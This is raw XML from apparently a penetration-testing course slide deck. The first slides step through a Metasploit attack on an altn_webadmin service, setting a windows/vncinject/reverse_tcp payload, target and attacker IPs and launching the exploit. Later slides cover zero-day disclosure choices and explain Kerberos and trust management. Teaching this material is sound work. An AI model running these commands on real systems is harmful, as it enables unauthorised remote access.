              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>altn_webadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>PAYLOAD =&gt; windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9343FCF1-43C7-4C63-9917-6616D1437B31}"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29C60518-41C4-47E8-8CCB-54716DC4533B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>50</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293773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olo 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Set options for exploit and payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf exploit(altn_webadmin) &gt;  show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Set the options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf…&gt; set RHOST 192.168.100.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TARGET IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf…&gt; set RPORT 1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VULNERABLE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf…&gt; set LHOST 192.168.100.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0"/>
              <a:t>Y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACKER IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>msf…&gt; set TARGET 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TYPE OF EXPLOIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Launch the exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" smtClean="0"/>
              <a:t>msf exploit(altn_webadmin) &gt; exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{22FF2E93-9CB6-40CA-B624-83F164953F82}"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3D358A02-1DD7-4E7A-A7B4-C18D7166F4D2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>51</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590697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it-IT" smtClean="0"/>
              <a:t>Vulnerabilities disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90488" y="1285875"/>
            <a:ext cx="8964612" cy="5311775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>If we find a new vulnerability (Zero Day Vulnerability) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What we have to do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Do not say anything and maintain the secret perhaps in the future the producer will fix it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spread the information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to all or just to the producer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Which level of detail reveal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Full disclosure with possibility of helping cracker?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Partial disclosure that could be unuseful?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sell it …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D996DF26-3776-4FE9-9C48-9683C67C9A70}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto numero diapositiva 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{84D1D242-44BC-4C91-80BB-94B472EEE7E1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto piè di pagina 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3127540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0"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kerberos</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53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590800" y="3200400"/>
            <a:ext cx="4343400" cy="3197828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484357" y="6477000"/>
            <a:ext cx="6364243" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Public domain image of Heracles and Cerberus. From an Attic bilingual amphora, 530–520 BC. From Italy (?).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39420503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Kerberos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="990600"/>
            <a:ext cx="8458200" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is an authentication protocol and a software suite implementing this protocol. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kerberos uses symmetric cryptography to authenticate clients to services and vice versa. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, Windows servers use Kerberos as the primary authentication mechanism, working in conjunction with Active Directory to maintain centralized user information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other possible uses of Kerberos include allowing users to log into other machines in a local-area network, authentication for web services, authenticating email client and servers, and authenticating the use of devices such as printers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Services using Kerberos authentication are commonly referred to as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kerberized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”.</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3581550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 Tickets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="8610600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Kerberos uses the concept of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>as a token that proves the identity of a user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Tickets are digital documents that store session keys. They are typically issued during a login session and then can be used instead of passwords for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Kerberized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> services. During the course of authentication, a client receives two tickets:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>ticket-granting ticket (TGT), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>which acts as a global identifier for a user and a session key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>service ticket, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>which authenticates a user to a particular service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>These tickets include time stamps that indicate an expiration time after which they become invalid. This expiration time can be set by Kerberos administrators depending on the service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23295405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 Servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="8610600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>To accomplish secure authentication, Kerberos uses a trusted third party known as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>key distribution center (KDC), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>which is composed of two components, typically integrated into a single server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>authentication server (AS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>which performs user authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>ticket-granting server (TGS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>which grants tickets to users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The authentication server keeps a database storing the secret keys of the users and services. The secret key of a user is typically generated by performing a one-way hash of the user-provided password. Kerberos is designed to be modular, so that it can be used with a number of encryption protocols, with AES being the default cryptosystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Kerberos aims to centralize authentication for an entire network—rather than storing sensitive authentication information at each user’s machine, this data is only maintained in one presumably secure location.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34389154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Kerberos Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="4648200" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The client and authentication server authenticate themselves to each other. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The client and ticket-granting server authenticate themselves to each other. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The client and requested service authenticate themselves to each other, at which point the service will be provided to the client.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>57</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5105400" y="1676400"/>
            <a:ext cx="3836093" cy="4276725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369299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Authentication Details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58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28600" y="2133600"/>
            <a:ext cx="8767935" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27689641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Authentication Details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59</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304800" y="1447799"/>
            <a:ext cx="8564532" cy="4705111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2032849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 Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="6934200" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>trust management system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a formal framework for specifying security policy in a precise language, which is usually a type of logic or programming language, together with a mechanism for ensuring that the specified policy is enforced. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A trust management system consists of two main components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>policy language </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> compliance checker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Policy rules are specified in the policy language and are enforced by the compliance checker.</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6</a:t>
            </a:fld>
